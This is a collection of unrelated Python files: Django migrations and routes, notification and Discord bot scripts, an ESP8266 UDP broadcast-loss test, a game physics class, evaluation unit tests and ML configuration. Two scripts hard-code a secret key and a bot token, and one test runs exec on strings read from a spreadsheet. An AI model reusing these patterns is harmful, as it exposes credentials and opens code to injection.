field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AddField(
model_name='s3deliveryerror',
name='delivery',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='errors', to='d4s2_api.S3Delivery'),
),
migrations.AddField(
model_name='ddsdeliveryerror',
name='delivery',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='errors', to='d4s2_api.DDSDelivery'),
),
]
|
import pushjet
import subprocess
from ConfigParser import SafeConfigParser
import sys
secret_key = str('6e7ae26ce1758cd28edb5251b7cd4142')
service = pushjet.Service(secret_key)
line = str(sys.argv[1])
service.send(line)
|
import discord
import asyncio
import logging
import json
logging.basicConfig(level=logging.DEBUG)
client = discord.Client()
@client.event
async def on_ready():
print('Connected!')
print('Username: ' + client.user.name)
print('ID: ' + client.user.id)
for i in range(130):
await client.ws.send(json.dumps({
'op': 1,
'd': 0,
}))
print("Finished ratelimiting")
@client.event
async def on_message(message):
if message.content.startswith('!editme'):
msg = await client.send_message(message.channel, '10')
await asyncio.sleep(3)
await client.edit_message(msg, '40')
@client.event
async def on_message_edit(before, after):
fmt = '**{0.author}** edited their message:\n{1.content}'
await client.send_message(after.channel, fmt.format(after, before))
client.run('litecord_RLoWjnc45pDX2shufGjijfyPbh2kV0sYGz2EwARhIAs=')
|
from django.urls import path
from . import views
app_name='reviews'
urlpatterns = [
path('<int:movie_pk>/', views.ReviewListCreate.as_view()),
path('<int:movie_pk>/detail/<int:review_pk>/', views.ReviewDetail.as_view()),
path('<int:review_pk>/like/', views.Like.as_view()),
path('<int:review_pk>/dislike/', views.Dislike.as_view()),
path('<int:review_pk>/report/', views.Reporting.as_view()),
path('<int:review_pk>/comments/', views.CommentCreate.as_view()),
path('<int:review_pk>/comments/<int:comment_pk>/', views.CommentDetail.as_view()),
] |
import time
import random
import threading
import socket
import re
from TCAction import PerformanceTCBase
from NativeLog import NativeLog
from Utility import Encoding
class SendThread(threading.Thread):
def __init__(self, sock, send_len, target_addr, delay):
threading.Thread.__init__(self)
self.sock = sock
self.send_len = send_len
self.target_addr = target_addr
self.delay = delay
self.exit_event = threading.Event()
self.send_count = 0
pass
def exit(self):
self.exit_event.set()
def run(self):
data = "A" * self.send_len
if self.sock is None:
return
while True:
if self.exit_event.isSet() is True:
break
try:
self.sock.sendto(data, self.target_addr)
except StandardError:
break
self.send_count += 1
time.sleep(self.delay * 0.001)
pass
def get_send_count(self):
return self.send_count
class RecvThread(threading.Thread):
def __init__(self, sock):
threading.Thread.__init__(self)
self.sock = sock
self.exit_event = threading.Event()
self.calc_event = threading.Event()
self.bytes_recv = 0
self.Max = 0.0
def start_calc(self):
self.calc_event.set()
def stop_calc(self):
self.calc_event.clear()
self.exit_event.set()
def run(self):
if self.sock is None:
return
while True:
if self.exit_event.isSet() is True:
break
try:
data, addr = self.sock.recvfrom(2048)
except StandardError:
break
if self.calc_event.isSet() is True:
self.bytes_recv += len(data)
if len(data) == 0:
start = time.time()
while True:
try:
data, addr = self.sock.recvfrom(2048)
except StandardError:
break
if len(data) > 0:
if self.calc_event.isSet() is True:
self.bytes_recv += len(data)
end = time.time()
break
if end - start > self.Max:
self.Max = end - start
def get_bytes_recv(self):
return self.bytes_recv
pass
def get_Max_time(self):
return self.Max
pass
class device_check(threading.Thread):
def __init__(self, port):
threading.Thread.__init__(self)
self.Max = 0.0
self.port = port
self.recv_data_cache = ""
self.cache_lock = threading.Lock()
self.exit_event = threading.Event()
def data_recv_callback(self, data):
with self.cache_lock:
self.recv_data_cache += data
pass
def exit(self):
self.exit_event.set()
pass
def run(self):
while self.exit_event.isSet() is False:
while True:
if self.recv_data_cache:
match = re.search("\+RECVFROM:\d+,\d+,\d+\.\d+\.\d+\.\d+,\d+", self.recv_data_cache)
if match is not None:
self.recv_data_cache = self.recv_data_cache[len(match.group()):]
else:
start = time.time()
end = 0.0
while True:
res = re.search("\+RECVFROM:\d+,\d+,\d+\.\d+\.\d+\.\d+,\d+", self.recv_data_cache)
if res is not None:
self.recv_data_cache = self.recv_data_cache[len(res.group()):]
end = time.time()
break
if end - start > self.Max:
self.Max = end - start
pass
def get_max_time(self):
return self.Max
class TestCase(PerformanceTCBase.PerformanceTCBase):
def __init__(self, test_case, test_env, timeout, log_path):
PerformanceTCBase.PerformanceTCBase.__init__(self, test_case, test_env, timeout, log_path)
self.send_len = 0
self.pc_send = 0
self.target_send = 0
self.test_time = 0
self.delay = 0
# load param from excel
cmd_set = test_case["cmd set"]
for i in range(1, len(cmd_set)):
if cmd_set[i][0] != "dummy":
cmd_string = "self." + cmd_set[i][0]
exec cmd_string
self.recv_cb_lock = threading.Lock()
self.recv_cb = dict.fromkeys(["SSC1"])
pass
def register_recv_callback(self, port_name, callback):
with self.recv_cb_lock:
if self.recv_cb[port_name] is None:
self.recv_cb[port_name] = [callback]
else:
self.recv_cb[port_name].append(callback)
pass
def process(self):
try:
# configurable params
send_len = self.send_len
pc_send = self.pc_send
target_send = self.target_send
test_time = self.test_time
delay = self.delay
ap_ssid = self.get_parameter("ap_ssid")
ap_password = self.get_parameter("ap_password")
pc_ip = self.get_parameter("pc_ip")
target_ip = self.get_parameter("target_ip")
except StandardError, e:
NativeLog.add_trace_critical("Error configuration for UDP script, error is %s" % e)
raise StandardError("Error configuration")
udp_port = random.randint(40000, 50000)
# reboot before executing
self.flush_data("SSC1")
self.serial_write_line("SSC1", "reboot")
if self.check_response("SSC1", "ready!!!", 5) is False:
NativeLog.add_trace_critical("Fail to reboot")
return
# set target as STA mode
self.flush_data("SSC1")
self.serial_write_line("SSC1", "op -S -o 1")
if self.check_response("SSC1", "+MODE:OK", 5) is False:
NativeLog.add_trace_critical("Fail to set mode")
return
# connect to AP
self.flush_data("SSC1")
self.serial_write_line("SSC1", "sta -C -s %s -p %s" % (ap_ssid, ap_password))
if self.check_response("SSC1", "+JAP:CONNECTED", 30) is False:
NativeLog.add_trace_critical("Fail to JAP")
return
# disable recv print on target
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -R -o 0")
if self.check_response("SSC1", "+RECVPRINT", 5) is False:
NativeLog.add_trace_critical("Fail to disable recv print")
return
# get broadcast ip
res = re.search("(\d+\.\d+\.\d+\.)\d+", pc_ip)
if res is not None:
udp = res.group(1)
broadcast_ip = udp + "255"
else:
NativeLog.add_trace_critical("No ip addr found")
return
# close all connection on target
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -T")
if self.check_response("SSC1", "+CLOSEALL", 5) is False:
NativeLog.add_trace_critical("Fail to close sock")
return
# create socket on pc
pc_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
pc_sock.bind((pc_ip, udp_port))
pc_sock.settimeout(1)
# create socket on target
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -B -t UDP -i %s -p %s" % (target_ip, udp_port))
if self.check_response("SSC1", "+BIND:0,OK,", 5) is False:
NativeLog.add_trace_critical("Fail to bind")
return
thread_dict = dict.fromkeys(["SSC1"])
thread_dict["SSC1"] = dict(zip(["check"], [None]))
thread_dict["SSC1"]["check"] = device_check(self.test_env.get_port_by_name("SSC1"))
self.register_recv_callback("SSC1", thread_dict["SSC1"]["check"].data_recv_callback)
send_thread = SendThread(pc_sock if pc_send is True else None, send_len, (broadcast_ip, udp_port), delay)
send_thread.start()
recv_thread = RecvThread(pc_sock if target_send is True else None)
recv_thread.start()
# start calculate
recv_thread.start_calc()
thread_dict["SSC1"]["check"].start()
send_count = 0
if target_send is True:
# do send from target
start = time.time()
while time.time() - start < test_time * 60:
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -S -s 0 -l %s -n 1000 -i %s -p %s -j %s" % (
send_len, broadcast_ip, udp_port, delay))
if self.check_response("SSC1", "+SEND:0,OK", 300) is False:
NativeLog.add_trace_critical("Fail to send")
return
send_count += 1000
else:
time.sleep(test_time * 60)
send_thread.exit()
send_thread.join()
# stop throughput calculate
while True:
if recv_thread.isAlive() is False:
recv_thread.stop_calc()
recv_thread.join()
break
Max = 0.0
recv_count = 0
if pc_send is True:
send_count = send_thread.get_send_count()
start = time.time()
rx_data_len = 0
suc_time = 0
while time.time() - start < 30:
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -Q -s 0 -o 1")
time.sleep(0.05)
data = self.serial_read_data("SSC1")
if data is not None:
res = re.search("\+RECVLEN:(\d+)", data)
if res is not None:
if rx_data_len < int(res.group(1)):
rx_data_len = int(res.group(1))
time.sleep(0.5)
else:
suc_time += 1
if suc_time > 5:
break
if (rx_data_len * 8 % send_len) > 0:
recv_count = rx_data_len / send_len + 1
else:
recv_count = rx_data_len / send_len
if recv_thread.get_bytes_recv() > 0:
if (recv_thread.get_bytes_recv() % send_len) > 0:
recv_count = recv_thread.get_bytes_recv() / send_len + 1
else:
recv_count = recv_thread.get_bytes_recv() / send_len
Max = recv_thread.get_Max_time()
thread_dict["SSC1"]["check"].exit()
pc_sock.close()
self.set_result("Succeed")
NativeLog.add_trace_critical("send_count is %s, recv_count is %s" % (send_count, recv_count))
NativeLog.add_trace_critical(
"UDP Broadcast lose rate is %.2f%%" % (float(send_count - recv_count) / send_count * 100))
NativeLog.add_trace_critical("UDP Broadcast lose test MAX time is %.4f" % Max)
@Encoding.encode_utf8(3)
def result_check(self, port_name, data):
PerformanceTCBase.PerformanceTCBase.result_check(self, port_name, data)
if port_name in self.recv_cb:
with self.recv_cb_lock:
callback_list = self.recv_cb[port_name]
if callback_list is not None:
for callback in callback_list:
callback(data)
pass
def main():
pass
if __name__ == '__main__':
main()
|
from haxballgym.game.common_values import COLLISION_FLAG_ALL
from haxballgym.game.objects.base import PhysicsObject
import numpy as np
import copy
class Disc(PhysicsObject):
"""
A class to represent the state of a disc from the game.
"""
def __init__(self, data_object=None, data_stadium=None):
if data_object is None:
data_object = {}
self.collision_group: int = self.transform_collision_dict(
data_object.get("cGroup")
)
self.collision_mask: int = self.transform_collision_dict(
data_object.get("cMask")
)
self.position: np.ndarray = np.array(data_object.get("pos"), dtype=float)
self.velocity: np.ndarray = np.array(data_object.get("speed"), dtype=float)
self.bouncing_coefficient: float = data_object.get("bCoef")
self.radius: float = data_object.get("radius")
self.inverse_mass: float = data_object.get("invMass")
self.damping: float = data_object.get("damping")
self.trait = data_object.get("trait")
self.apply_trait(self, data_stadium)
self.apply_default_values()
def apply_default_values(self):
if self.collision_group is None:
self.collision_group = COLLISION_FLAG_ALL
if self.collision_mask is None:
self.collision_mask = COLLISION_FLAG_ALL
if np.isnan(self.velocity):
self.velocity = np.zeros(2)
if self.bouncing_coefficient is None:
self.bouncing_coefficient = 0.5
if self.radius is None:
self.radius = 10
if self.inverse_mass is None:
self.inverse_mass = 0
if self.damping is None:
self.damping = 0.99
def copy(self, other: "Disc") -> "Disc":
self.collision_group = copy.copy(other.collision_group)
self.collision_mask = copy.copy(other.collision_mask)
self.position = copy.copy(other.position)
self.velocity = copy.copy(other.velocity)
self.bouncing_coefficient = copy.copy(other.bouncing_coefficient)
self.radius = copy.copy(other.radius)
self.inverse_mass = copy.copy(other.inverse_mass)
self.damping = copy.copy(other.damping)
|
from six import PY2
import collections
from syn.five import xrange
from syn.types.a import Type, Mapping, Dict, \
hashable, serialize, deserialize, estr, rstr, visit, find_ne, \
DiffersAtKey, KeyDifferences, deep_feq, safe_sorted, primitive_form, \
collect
from syn.types.a import enumerate as enumerate_
from syn.base_utils import is_hashable, assert_equivalent, on_error, elog, \
ngzwarn, is_unique, subclasses, hangwatch
from syn.globals import TEST_SAMPLES as SAMPLES
SAMPLES //= 10
SAMPLES = max(SAMPLES, 1)
ngzwarn(SAMPLES, 'SAMPLES')
#-------------------------------------------------------------------------------
def ss(obj):
if isinstance(obj, collections.Mapping):
return safe_sorted(obj.values())
return safe_sorted(obj)
ss(1)
ss({})
def examine_mapping(cls, val):
assert type(val) is cls.type
assert is_hashable(hashable(val))
sval = deserialize(serialize(val))
assert deep_feq(sval, val) or deep_feq(collect(sval, ss), collect(val, ss))
assert deserialize(serialize(cls.type)) is cls.type
assert isinstance(rstr(val), str)
assert list(visit(val)) == safe_sorted(list(val.items()))
assert find_ne(val, val) is None
# NOTE: estr has been relegated to experimental status for now
# eitem = eval(estr(val))
# assert deep_feq(sval, val)
# assert type(eitem) is cls.type
#-------------------------------------------------------------------------------
# Mapping
def test_mapping():
d = dict(a = 1, b = 2.3)
t = Type.dispatch(d)
assert isinstance(t, Mapping)
assert type(t) is Dict
if PY2:
assert set(hashable(d)) == set(t.hashable()) == \
{'__builtin__.dict', ('a', 1), ('b', 2.3)}
else:
assert set(hashable(d)) == set(t.hashable()) == \
{'builtins.dict', ('a', 1), ('b', 2.3)}
d1 = dict(a=1, b=2)
d2 = dict(a=1, b=2, c=3)
d3 = dict(a=1, b=3)
assert find_ne(d1, d2) == KeyDifferences(d1, d2)
assert find_ne(d2, d1) == KeyDifferences(d2, d1)
assert find_ne(d1, d3) == DiffersAtKey(d1, d3, 'b')
e1 = eval(estr(d1))
assert_equivalent(e1, d1)
assert not is_hashable(d)
assert is_hashable(hashable(d))
examine_mapping(Dict, d)
for cls in subclasses(Mapping):
for k in xrange(SAMPLES):
val = cls.generate()
with on_error(elog, examine_mapping, (cls, val)):
hangwatch(1, examine_mapping, cls, val)
buf = []
last = None
for item in enumerate_(cls.type, max_enum=SAMPLES * 10, step=100):
assert type(item) is cls.type
assert item != last
buf.append(item)
last = item
assert is_unique(buf)
d = dict(a=1, b=[1, 2, (3, 4)])
assert primitive_form(d) == dict(a=1, b=[1, 2, [3, 4]])
assert collect(d) == primitive_form(d)
#-------------------------------------------------------------------------------
# Bad test cases
def test_bad_cases():
d = {'\x8a\x86k\xd1k\xafd\x12': set([-1.3846455538007134e+308,
-2812529263850842664,
(-3.90682317364909e+307+1.010644744358304e+308j),
1.0698329510780509e+308]),
(8.814339430527538e+307+7.59265276795928e+307j): None,
-78098711297023825948717305522402599973510534836931705515263: ()}
examine_mapping(Dict, d)
# from syn.types.a import OrderedDict as OrderedDict_
# from collections import OrderedDict
# val = OrderedDict([((-1.4295764407292497e+308+1.424986100748943e+308j),
# -810127967009107279),
# (-1.827012095486929e+307, None),
# (1.6642652599670256e+308,
# {8.938423188190213e+307: False,
# (1.0761629010589936e+308-1.6057678269394774e+308j): False}),
# (1321286071298621711, (-1.1971920347818657e+308-7.047893113499448e+307j))])
# examine_mapping(OrderedDict_, val)
#-------------------------------------------------------------------------------
if __name__ == '__main__': # pragma: no cover
from syn.base_utils import run_all_tests
run_all_tests(globals(), verbose=True, print_errors=False)
|
# Lint as: python3
"""Tests for google3.third_party.py.language.google.qed.qed_eval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import qed_eval
from absl.testing import absltest
example_1 = """
{
"example_id": -6560319052930436991,
"title_text": "Flight (Grey's Anatomy)",
"url": "https://en.wikipedia.org//w/index.php?title=Flight_(Grey%27s_Anatomy)&oldid=804214813",
"question_text": "who died in the plane crash greys anatomy",
"paragraph_text": "`` Flight '' is the twenty - fourth and final episode of the eighth season of the American television medical drama Grey 's Anatomy , and the show 's 172nd episode overall . It was written by series creator Shonda Rhimes , and directed by Rob Corn . The episode was originally broadcast on the American Broadcasting Company ( ABC ) in the United States on May 17 , 2012 . In the episode , six doctors from Seattle Grace Mercy West Hospital who are victims of an aviation accident fight to stay alive , but Dr. Lexie Grey ( Chyler Leigh ) ultimately dies . Other storylines occur in Seattle where Dr. Richard Webber ( James Pickens , Jr . ) plans his annual dinner for the departing residents , Dr. Owen Hunt ( Kevin McKidd ) fires Dr. Teddy Altman ( Kim Raver ) , and Dr. Miranda Bailey ( Chandra Wilson ) gets engaged .",
"sentence_starts": [
0,
174,
250,
372,
556
],
"original_nq_answers": [
[
{
"start": 506,
"end": 520,
"string": "Dr. Lexie Grey"
}
],
[
{
"start": 506,
"end": 537,
"string": "Dr. Lexie Grey ( Chyler Leigh )"
}
],
[
{
"start": 506,
"end": 520,
"string": "Dr. Lexie Grey"
},
{
"start": 523,
"end": 535,
"string": "Chyler Leigh"
}
]
],
"annotation": {
"referential_equalities": [
{
"question_reference": {
"start": 12,
"end": 27,
"string": "the plane crash"
},
"sentence_reference": {
"start": 459,
"end": 479,
"bridge": false,
"string": "an aviation accident"
}
},
{
"question_reference": {
"start": 28,
"end": 41,
"string": "greys anatomy"
},
"sentence_reference": {
"start": -1,
"end": -1,
"bridge": "of",
"string": ""
}
}
],
"answer": [
{
"sentence_reference": {
"start": 506,
"end": 520,
"bridge": false,
"string": "Dr. Lexie Grey"
},
"paragraph_reference": {
"start": 506,
"end": 520,
"string": "Dr. Lexie Grey"
}
}
],
"explanation_type": "single_sentence",
"selected_sentence": {
"start": 372,
"end": 556,
"string": "In the episode , six doctors from Seattle Grace Mercy West Hospital who are victims of an aviation accident fight to stay alive , but Dr. Lexie Grey ( Chyler Leigh ) ultimately dies . "
}
}
}"""
example_2 = """
{
"example_id": -4340755100872459608,
"title_text": "Health (gaming)",
"url": "https://en.wikipedia.org//w/index.php?title=Health_(gaming)&oldid=819315199",
"question_text": "what does hp mean in war and order",
"paragraph_text": "Health or vitality is an attribute assigned to entities , such as the player character , enemies and objects within a role - playing or video game , that indicates its state in combat . Health is usually measured in hit points or health points , shortened to HP . When the HP of a player character reaches zero , the player may lose a life or their character might become incapacitated or die . When the HP of an enemy reaches zero , it may be defeated or die and the player is usually rewarded in some way .",
"sentence_starts": [
0,
186,
264,
395
],
"original_nq_answers": [
[
{
"start": 216,
"end": 243,
"string": "hit points or health points"
}
]
],
"annotation": {
"referential_equalities": [
{
"question_reference": {
"start": 10,
"end": 12,
"string": "hp"
},
"sentence_reference": {
"start": 259,
"end": 261,
"bridge": false,
"string": "HP"
}
}
],
"answer": [
{
"sentence_reference": {
"start": 216,
"end": 243,
"bridge": false,
"string": "hit points or health points"
},
"paragraph_reference": {
"start": 216,
"end": 243,
"string": "hit points or health points"
}
}
],
"explanation_type": "single_sentence",
"selected_sentence": {
"start": 186,
"end": 264,
"string": "Health is usually measured in hit points or health points , shortened to HP . "
}
}
}"""
class QedEvalTest(absltest.TestCase):
def setUp(self):
super(QedEvalTest, self).setUp()
self._annotation_jsonlines = [json.loads(example_1), json.loads(example_2)]
annot_elems = [
qed_eval.load_single_line(l) for l in self._annotation_jsonlines
]
self.annotation_dict = {elem.example_id: elem for elem in annot_elems}
def get_span(self, text, span):
return {"start": span[0], "end": span[1], "string": text[span[0]:span[1]]}
def set_answer(self, example, answers):
output_answers = example["annotation"]["answer"]
output_answers.clear()
for answer in answers:
output_answers.append({
"paragraph_reference":
self.get_span(example["paragraph_text"], answer)
})
def set_refs(self, example, refs):
refs_output = example["annotation"]["referential_equalities"]
refs_output.clear()
for ref in refs:
question_span, sentence_span = ref
refs_output.append({
"question_reference":
self.get_span(example["question_text"], question_span),
"sentence_reference":
self.get_span(example["paragraph_text"], sentence_span)
})
def test_strict_accuracy_on_correct(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(506, 520)]) # correct answer
self.set_refs(
prediction_jsonlines[0],
[
((12, 27), (459, 479)), # two correct refs
((28, 41), (-1, -1))
])
self.set_answer(prediction_jsonlines[1], [(216, 243)]) # correct answer
self.set_refs(prediction_jsonlines[1],
[((10, 12), (259, 261))]) # one correct ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["exact_match_accuracy"], 1.0)
self.assertEqual(score_dict["pair"][0], 1.0)
self.assertEqual(score_dict["pair"][1], 1.0)
self.assertEqual(score_dict["question_mention"][0], 1.0)
self.assertEqual(score_dict["question_mention"][1], 1.0)
self.assertEqual(score_dict["context_mention"][0], 1.0)
self.assertEqual(score_dict["context_mention"][1], 1.0)
self.assertEqual(score_dict["all_mention"][0], 1.0)
self.assertEqual(score_dict["all_mention"][1], 1.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
def test_strict_accuracy(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(506, 520)]) # correct answer
self.set_refs(prediction_jsonlines[0],
[((28, 41), (-1, -1))]) # one correct ref, one missing
self.set_answer(prediction_jsonlines[1], [(217, 243)]) # wrong answer
self.set_refs(prediction_jsonlines[1],
[((10, 12), (259, 261))]) # one correct ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["exact_match_accuracy"], 0.5)
self.assertEqual(score_dict["pair"][0], 1.0)
self.assertEqual(score_dict["pair"][1], 2.0 / 3.0)
self.assertEqual(score_dict["question_mention"][0], 1.0)
self.assertEqual(score_dict["question_mention"][1], 2.0 / 3.0)
self.assertEqual(score_dict["context_mention"][0], 1.0)
self.assertEqual(score_dict["context_mention"][1], 1.0 / 2.0)
self.assertEqual(score_dict["all_mention"][0], 1.0)
self.assertEqual(score_dict["all_mention"][1], 3.0 / 5.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0 / 2.0)
def test_non_strict_accuracy(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(506, 520)]) # correct answer
self.set_refs(
prediction_jsonlines[0],
[
((15, 27), (462, 479)), # one correct ref (non strict)
((28, 41), (-1, -1))
]) # one correct ref
self.set_answer(prediction_jsonlines[1],
[(217, 243)]) # correct answer (non strict)
self.set_refs(prediction_jsonlines[1],
[((10, 12), (259, 261))]) # one correct ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=False)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 1.0)
self.assertEqual(score_dict["pair"][0], 1.0)
self.assertEqual(score_dict["pair"][1], 1.0)
self.assertEqual(score_dict["question_mention"][0], 1.0)
self.assertEqual(score_dict["question_mention"][1], 1.0)
self.assertEqual(score_dict["context_mention"][0], 1.0)
self.assertEqual(score_dict["context_mention"][1], 1.0)
self.assertEqual(score_dict["all_mention"][0], 1.0)
self.assertEqual(score_dict["all_mention"][1], 1.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 0.5)
self.assertEqual(score_dict["pair"][0], 2.0 / 3.0)
self.assertEqual(score_dict["pair"][1], 2.0 / 3.0)
self.assertEqual(score_dict["question_mention"][0], 2.0 / 3.0)
self.assertEqual(score_dict["question_mention"][1], 2.0 / 3.0)
self.assertEqual(score_dict["context_mention"][0], 0.5)
self.assertEqual(score_dict["context_mention"][1], 0.5)
self.assertEqual(score_dict["all_mention"][0], 3.0 / 5.0)
self.assertEqual(score_dict["all_mention"][1], 3.0 / 5.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0 / 2.0)
def test_non_strict_accuracy_not_enough_overlap(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(500, 510)]) # correct answer
self.set_refs(
prediction_jsonlines[0],
[
((16, 27), (462, 481)), # one wrong ref (overlap 0.88)
((30, 45), (0, 0))
]) # one wrong ref
self.set_answer(prediction_jsonlines[1], [(230, 250)]) # correct answer
self.set_refs(prediction_jsonlines[1],
[((9, 12), (259, 262))]) # one wrong ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=False)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 0.0)
self.assertEqual(score_dict["pair"][0], 0.0)
self.assertEqual(score_dict["pair"][1], 0.0)
self.assertEqual(score_dict["question_mention"][0], 0.0)
self.assertEqual(score_dict["question_mention"][1], 0.0)
self.assertEqual(score_dict["context_mention"][0], 0.0)
self.assertEqual(score_dict["context_mention"][1], 0.0)
self.assertEqual(score_dict["all_mention"][0], 0.0)
self.assertEqual(score_dict["all_mention"][1], 0.0)
self.assertEqual(score_dict["answer_accuracy"], 0.0)
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 0.0)
self.assertEqual(score_dict["pair"][0], 0.0)
self.assertEqual(score_dict["pair"][1], 0.0)
self.assertEqual(score_dict["question_mention"][0], 0.0)
self.assertEqual(score_dict["question_mention"][1], 0.0)
self.assertEqual(score_dict["context_mention"][0], 0.0)
self.assertEqual(score_dict["context_mention"][1], 0.0)
self.assertEqual(score_dict["all_mention"][0], 0.0)
self.assertEqual(score_dict["all_mention"][1], 0.0)
self.assertEqual(score_dict["answer_accuracy"], 0.0)
def test_accuracy_for_alternative_answers(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0],
[(506, 537)]) # correct answer (alternative answer)
self.set_answer(prediction_jsonlines[1], [(216, 243)]) # correct answer
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
def test_accuracy_for_alternative_answers_with_multiple_spans(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0],
[(524, 536), (505, 519)]) # correct alternative, non strict
self.set_answer(prediction_jsonlines[1], [(216, 243)]) # correct answer
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["answer_accuracy"], 0.5)
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=False)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
if __name__ == "__main__":
absltest.main()
|
import bs4
import requests
from bs4 import BeautifulSoup
from datetime import datetime
def go():
a = str(datetime.now().month)
b = str(datetime.now().day -1)
c = str(datetime.now().year -1)
d = str(datetime.now().year)
yesterday = a + '/' + b + '/' + d
last_year = a + '/' + b + '/' + c
return yesterday, last_year
|
#!/usr/bin/env python
import sys, os
import itertools, shutil
path = os.path.abspath(__file__)
path = os.path.split(path)[0]
os.chdir(path)
print path
device_ssh_ip = ""
ssh_device = device_ssh_ip.split(",")
path_tcs = path + "/tcs"
path_result= path + "/result"
path_allpairs = path + "/allpairs"
path_resource = path + "/resource"
seed_file = path_allpairs + "/positive/input_seed.txt"
seed_negative = path_allpairs + "/negative"
seed_positive =path_allpairs + "/positivee"
seed_file_na = seed_negative + "/input_seed_negative.txt"
selfcomb_file = path_allpairs + "/selfcomb.txt"
output_file = path_allpairs + "/output.txt"
output_file_ne = path_allpairs + "/output_negative.txt"
report_path = path + "/report"
report_file = report_path + "/wrt-manifest-tizen-tests.xml"
report_summary_file = report_path + "/summary.xml"
sh_path = path + "/script"
log_path = report_path + "/log_"
device_path = "/home/app/content/tct/"
run_times = 3
version="6.35.1.2"
name="wrt-manifest-tizen-tests"
|
import json
import torch
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # sets device for model and PyTorch tensors
meta_file = 'data/BZNSYP/ProsodyLabeling/000001-010000.txt'
wave_folder = 'data/BZNSYP/Wave'
vacab_file = 'data/vacab.json'
with open(vacab_file, 'r', encoding='utf-8') as file:
data = json.load(file)
VOCAB = data['VOCAB']
IVOCAB = data['IVOCAB']
num_train = 9900
num_valid = 100
################################
# Experiment Parameters #
################################
epochs = 500
iters_per_checkpoint = 1000
seed = 1234
dynamic_loss_scaling = True
fp16_run = False
distributed_run = False
################################
# Data Parameters #
################################
load_mel_from_disk = False
training_files = 'filelists/bznsyp_audio_text_train_filelist.txt'
validation_files = 'filelists/bznsyp_audio_text_valid_filelist.txt'
################################
# Audio Parameters #
################################
max_wav_value = 32768.0
sampling_rate = 22050
filter_length = 1024
hop_length = 256
win_length = 1024
n_mel_channels = 80
mel_fmin = 0.0
mel_fmax = 8000.0
################################
# Model Parameters #
################################
n_symbols = 35
symbols_embedding_dim = 512
# Encoder parameters
encoder_kernel_size = 5
encoder_n_convolutions = 3
encoder_embedding_dim = 512
# Decoder parameters
n_frames_per_step = 1 # currently only 1 is supported
decoder_rnn_dim = 1024
prenet_dim = 256
max_decoder_steps = 1000
gate_threshold = 0.5
p_attention_dropout = 0.1
p_decoder_dropout = 0.1
# Attention parameters
attention_rnn_dim = 1024
attention_dim = 128
# Location Layer parameters
attention_location_n_filters = 32
attention_location_kernel_size = 31
# Mel-post processing network parameters
postnet_embedding_dim = 512
postnet_kernel_size = 5
postnet_n_convolutions = 5
################################
# Optimization Hyperparameters #
################################
learning_rate = 1e-3
weight_decay = 1e-6
batch_size = 64
mask_padding = True # set model's padded outputs to padded values
|
# Write a function that accepts two positive integers which are the height
# and width of a rectangle and returns a list that contains the area and perimeter
# of that rectangle.
def area_perimeter_rectangle(height, width):
result = []
result_area = height * width
result_perim = 2*(height + width)
result.append(result_area)
result.append(result_perim)
return result
# for testing purposes
print(area_perimeter_rectangle(4, 5))
# or
#
# def _rectangle_sample_(length, breadth):
# # Calculate the area
# area = length * breadth
# # Calculate the perimeter
# perimeter = 2*length + 2*breadth
